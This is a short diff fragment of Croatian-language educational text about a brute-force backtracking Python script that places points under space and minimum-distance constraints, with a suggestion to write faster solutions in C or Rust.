+U nastavku je dana Python skripta koja pronalazi validno rješenje ovih uvjeta, koja je kompatibilna s pypy implementacijom. Skripta koristi bruteforce pristup s backtrack algoritmom, bez heuristika. Moguće je napisati skriptu koja koristi prikladne heuristike i puno brže pronalazi validnu konfiguraciju rješenja.
@@ Line 5375: / Line 5464: @@
-Ako vas zanima više o ovom problemu, probajte napisati algoritam koji brže nalazi validna rješenja i probajte pronaći najveći broj točaka za koji je moguće pronaći validnu konfiguraciju uz iste uvjete prostora i minimalne udaljenosti. Za ovo se preporučuje napisati implementaciju u C programskom jeziku ili u Rustu.
+Ako vas zanima više, probajte napisati algoritam koji brže nalazi validna rješenja i probajte pronaći najveći broj točaka za koji je moguće pronaći validnu konfiguraciju uz iste uvjete prostora i minimalne udaljenosti. Za ovo se preporučuje napisati implementaciju u C programskom jeziku ili u Rustu.